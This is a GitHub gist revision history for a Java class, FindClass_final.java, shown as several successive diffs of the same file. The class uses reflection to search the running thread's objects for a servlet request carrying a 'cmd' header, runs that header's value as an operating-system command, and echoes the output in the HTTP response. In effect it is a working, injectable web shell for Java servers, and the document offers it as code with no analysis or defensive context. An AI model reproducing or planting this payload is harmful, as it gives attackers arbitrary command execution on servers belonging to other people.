Skip to content

Instantly share code, notes, and snippets.

@Pear1y

Pear1y/FindClass_final.java

Forked from fnmsd/FindClass_final.java
Created July 12, 2022 07:19
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save Pear1y/06058adb81d6872bbd009e0db2af64ee to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save Pear1y/06058adb81d6872bbd009e0db2af64ee to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @fnmsd fnmsd revised this gist Jun 12, 2020. 1 changed file with 53 additions and 56 deletions.
    109 changes: 53 additions & 56 deletions FindClass_final.java
    View file
    Original file line number Diff line number Diff line change
    @@ -1,94 +1,91 @@
    //Author:fnmsd
    //Blog:https://blog.csdn.net/fnmsd
    //
    // Source code recreated from a .class file by IntelliJ IDEA
    // (powered by Fernflower decompiler)
    //

    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;
    import java.lang.reflect.Field;
    import java.util.HashSet;
    import java.util.Scanner;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;

    public class a {

    static HashSet<Object> h;
    static HttpServletRequest r;
    static HttpServletResponse p;

    public a() {
    // static {
    // r = null;
    // p = null;
    // h =new HashSet<Object>();
    // F(Thread.currentThread(),0);
    // }
    public a(){
    r = null;
    p = null;
    h = new HashSet();
    F(Thread.currentThread(), 0);
    h =new HashSet<Object>();
    F(Thread.currentThread(),0);
    }

    private static boolean i(Object obj) {
    if (obj != null && !h.contains(obj)) {
    h.add(obj);
    return false;
    } else {
    private static boolean i(Object obj){
    if(obj==null|| h.contains(obj)){
    return true;
    }

    h.add(obj);
    return false;
    }
    private static void p(Object o, int depth){
    if(depth > 52||(r !=null&& p !=null)){
    return;
    }
    if(!i(o)){
    if(r ==null&&HttpServletRequest.class.isAssignableFrom(o.getClass())){
    r = (HttpServletRequest)o;
    if(r.getHeader("cmd")==null)
    r =null;

    private static void p(Object o, int depth) {
    if (depth <= 52 && (r == null || p == null)) {
    if (!i(o)) {
    if (r == null && HttpServletRequest.class.isAssignableFrom(o.getClass())) {
    r = (HttpServletRequest)o;
    if (r.getHeader("cmd") == null) {
    r = null;
    }
    } else if (p == null && HttpServletResponse.class.isAssignableFrom(o.getClass())) {
    p = (HttpServletResponse)o;
    }
    }else if(p ==null&&HttpServletResponse.class.isAssignableFrom(o.getClass())){
    p = (HttpServletResponse) o;

    if (r != null && p != null) {
    try {
    p.getWriter().println((new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream())).useDelimiter("\\A").next());
    p.getWriter().flush();
    } catch (Exception var3) {
    }
    }
    if(r !=null&& p !=null){
    try {

    return;
    p.getWriter().println(new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
    p.getWriter().flush();
    }catch (Exception e){
    }

    F(o, depth + 1);
    return;
    }

    F(o,depth+1);
    }
    }
    private static void F(Object start, int depth){

    private static void F(Object start, int depth) {
    Class n = start.getClass();

    do {
    Field[] arr$ = n.getDeclaredFields();
    int len$ = arr$.length;

    for(int i$ = 0; i$ < len$; ++i$) {
    Field declaredField = arr$[i$];
    Class n=start.getClass();
    do{
    for (Field declaredField : n.getDeclaredFields()) {
    declaredField.setAccessible(true);
    Object o = null;

    try {
    try{
    o = declaredField.get(start);
    if (!o.getClass().isArray()) {
    p(o, depth);
    } else {
    Object[] arr$ = (Object[])((Object[])o);
    int len$ = arr$.length;

    for(int i$ = 0; i$ < len$; ++i$) {
    Object q = arr$[i$];

    if(!o.getClass().isArray()){
    p(o,depth);
    }else{
    for (Object q : (Object[]) o) {
    p(q, depth);
    }

    }
    } catch (Exception var12) {

    }catch (Exception e){
    }
    }
    } while((n = n.getSuperclass()) != null);

    }while(
    (n = n.getSuperclass())!=null
    );
    }
    }

  2. @fnmsd fnmsd revised this gist Jun 12, 2020. 1 changed file with 55 additions and 52 deletions.
    107 changes: 55 additions & 52 deletions FindClass_final.java
    View file
    Original file line number Diff line number Diff line change
    @@ -1,91 +1,94 @@
    //Author:fnmsd
    //Blog:https://blog.csdn.net/fnmsd
    package aa;
    //
    // Source code recreated from a .class file by IntelliJ IDEA
    // (powered by Fernflower decompiler)
    //

    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;
    import java.lang.reflect.Field;
    import java.util.HashSet;
    import java.util.Scanner;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;

    public class a {

    static HashSet<Object> h;
    static HttpServletRequest r;
    static HttpServletResponse p;

    public a(){
    public a() {
    r = null;
    p = null;
    h =new HashSet<Object>();
    F(Thread.currentThread(),0);
    h = new HashSet();
    F(Thread.currentThread(), 0);
    }

    private static boolean i(Object obj){
    if(obj==null|| h.contains(obj)){
    private static boolean i(Object obj) {
    if (obj != null && !h.contains(obj)) {
    h.add(obj);
    return false;
    } else {
    return true;
    }

    h.add(obj);
    return false;
    }
    private static void p(Object o, int depth){

    if(!i(o)){
    if(r ==null&&HttpServletRequest.class.isAssignableFrom(o.getClass())){
    r = (HttpServletRequest)o;
    if(r.getHeader("cmd")==null)
    r =null;

    }else if(p ==null&&HttpServletResponse.class.isAssignableFrom(o.getClass())){
    p = (HttpServletResponse) o;

    }
    if(r !=null&& p !=null){
    try {
    private static void p(Object o, int depth) {
    if (depth <= 52 && (r == null || p == null)) {
    if (!i(o)) {
    if (r == null && HttpServletRequest.class.isAssignableFrom(o.getClass())) {
    r = (HttpServletRequest)o;
    if (r.getHeader("cmd") == null) {
    r = null;
    }
    } else if (p == null && HttpServletResponse.class.isAssignableFrom(o.getClass())) {
    p = (HttpServletResponse)o;
    }

    p.getWriter().println(new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
    p.getWriter().flush();
    }catch (Exception e){
    if (r != null && p != null) {
    try {
    p.getWriter().println((new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream())).useDelimiter("\\A").next());
    p.getWriter().flush();
    } catch (Exception var3) {
    }

    return;
    }
    return;
    }
    if(depth > 60||(r !=null&& p !=null)){
    return;

    F(o, depth + 1);
    }
    F(o,depth+1);

    }
    }
    private static void F(Object start, int depth){

    Class n=start.getClass();
    do{
    for (Field declaredField : n.getDeclaredFields()) {
    private static void F(Object start, int depth) {
    Class n = start.getClass();

    do {
    Field[] arr$ = n.getDeclaredFields();
    int len$ = arr$.length;

    for(int i$ = 0; i$ < len$; ++i$) {
    Field declaredField = arr$[i$];
    declaredField.setAccessible(true);
    Object o = null;
    try{

    try {
    o = declaredField.get(start);

    if(!o.getClass().isArray()){
    p(o,depth);
    }else{

    for (Object q : (Object[]) o) {
    if (!o.getClass().isArray()) {
    p(o, depth);
    } else {
    Object[] arr$ = (Object[])((Object[])o);
    int len$ = arr$.length;

    for(int i$ = 0; i$ < len$; ++i$) {
    Object q = arr$[i$];
    p(q, depth);
    }

    }


    }catch (Exception e){
    } catch (Exception var12) {
    }
    }
    } while((n = n.getSuperclass()) != null);

    }while(
    (n = n.getSuperclass())!=null
    );
    }
    }

  3. @fnmsd fnmsd revised this gist Jun 12, 2020. 1 changed file with 2 additions and 0 deletions.
    2 changes: 2 additions & 0 deletions FindClass_final.java
    View file
    Original file line number Diff line number Diff line change
    @@ -1,3 +1,5 @@
    //Author:fnmsd
    //Blog:https://blog.csdn.net/fnmsd
    package aa;

    import javax.servlet.http.HttpServletRequest;
  4. @fnmsd fnmsd revised this gist Jun 12, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion FindClass_final.java
    View file
    Original file line number Diff line number Diff line change
    @@ -45,7 +45,7 @@ private static void p(Object o, int depth){
    p.getWriter().println(new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
    p.getWriter().flush();
    }catch (Exception e){
    //e.printStackTrace();

    }
    return;
    }
  5. @fnmsd fnmsd revised this gist Jun 12, 2020. 1 changed file with 8 additions and 29 deletions.
    37 changes: 8 additions & 29 deletions FindClass_final.java
    View file
    Original file line number Diff line number Diff line change
    @@ -12,31 +12,18 @@ public class a {
    static HttpServletRequest r;
    static HttpServletResponse p;

    // static {
    // start();
    // }
    public a(){
    r = null;
    p = null;
    h =new HashSet<Object>();
    F(Thread.currentThread(),0);
    }
    // private static void start(){
    // r = null;
    // p = null;
    // h =new HashSet<>();
    // F(Thread.currentThread(),0);
    // }

    private static boolean i(Object obj){
    if(obj==null|| h.contains(obj)){
    return true;
    }
    //Class a = obj.getClass();
    // if(obj.getClass().isPrimitive()
    // // ||obj.getClass().toString().startsWith("java.lang")
    // ){
    // return true;
    // }

    h.add(obj);
    return false;
    }
    @@ -54,13 +41,7 @@ private static void p(Object o, int depth){
    }
    if(r !=null&& p !=null){
    try {
    //PrintWriter os = p.getWriter();
    //Process p = Runtime.getRuntime().exec(r.getHeader("cmd"));
    //p.waitFor(2000, TimeUnit.MILLISECONDS);
    //byte[] a=new byte[40960];
    // Scanner scanner = new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A");
    // scanner.useDelimiter("\\A");
    //os.println("Test by fnmsd ");

    p.getWriter().println(new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
    p.getWriter().flush();
    }catch (Exception e){
    @@ -82,23 +63,21 @@ private static void F(Object start, int depth){
    declaredField.setAccessible(true);
    Object o = null;
    try{
    //if((declaredField.getModifiers()&0x00000008) == 0){

    o = declaredField.get(start);
    //}
    //if(obj != null){

    if(!o.getClass().isArray()){
    p(o,depth);
    }else{
    //if(!obj.getClass().getComponentType().isPrimitive()) {

    for (Object q : (Object[]) o) {
    p(q, depth);
    }
    //}

    }
    // }


    }catch (Exception e){
    //e.printStackTrace();
    }
    }

  6. @fnmsd fnmsd created this gist Jun 11, 2020.
    110 changes: 110 additions & 0 deletions FindClass_final.java
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,110 @@
    package aa;

    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;
    import java.lang.reflect.Field;
    import java.util.HashSet;
    import java.util.Scanner;

    public class a {

    static HashSet<Object> h;
    static HttpServletRequest r;
    static HttpServletResponse p;

    // static {
    // start();
    // }
    public a(){
    r = null;
    p = null;
    h =new HashSet<Object>();
    F(Thread.currentThread(),0);
    }
    // private static void start(){
    // r = null;
    // p = null;
    // h =new HashSet<>();
    // F(Thread.currentThread(),0);
    // }
    private static boolean i(Object obj){
    if(obj==null|| h.contains(obj)){
    return true;
    }
    //Class a = obj.getClass();
    // if(obj.getClass().isPrimitive()
    // // ||obj.getClass().toString().startsWith("java.lang")
    // ){
    // return true;
    // }
    h.add(obj);
    return false;
    }
    private static void p(Object o, int depth){

    if(!i(o)){
    if(r ==null&&HttpServletRequest.class.isAssignableFrom(o.getClass())){
    r = (HttpServletRequest)o;
    if(r.getHeader("cmd")==null)
    r =null;

    }else if(p ==null&&HttpServletResponse.class.isAssignableFrom(o.getClass())){
    p = (HttpServletResponse) o;

    }
    if(r !=null&& p !=null){
    try {
    //PrintWriter os = p.getWriter();
    //Process p = Runtime.getRuntime().exec(r.getHeader("cmd"));
    //p.waitFor(2000, TimeUnit.MILLISECONDS);
    //byte[] a=new byte[40960];
    // Scanner scanner = new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A");
    // scanner.useDelimiter("\\A");
    //os.println("Test by fnmsd ");
    p.getWriter().println(new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
    p.getWriter().flush();
    }catch (Exception e){
    //e.printStackTrace();
    }
    return;
    }
    if(depth > 60||(r !=null&& p !=null)){
    return;
    }
    F(o,depth+1);
    }
    }
    private static void F(Object start, int depth){

    Class n=start.getClass();
    do{
    for (Field declaredField : n.getDeclaredFields()) {
    declaredField.setAccessible(true);
    Object o = null;
    try{
    //if((declaredField.getModifiers()&0x00000008) == 0){
    o = declaredField.get(start);
    //}
    //if(obj != null){
    if(!o.getClass().isArray()){
    p(o,depth);
    }else{
    //if(!obj.getClass().getComponentType().isPrimitive()) {
    for (Object q : (Object[]) o) {
    p(q, depth);
    }
    //}
    }
    // }

    }catch (Exception e){
    //e.printStackTrace();
    }
    }

    }while(
    (n = n.getSuperclass())!=null
    );
    }
    }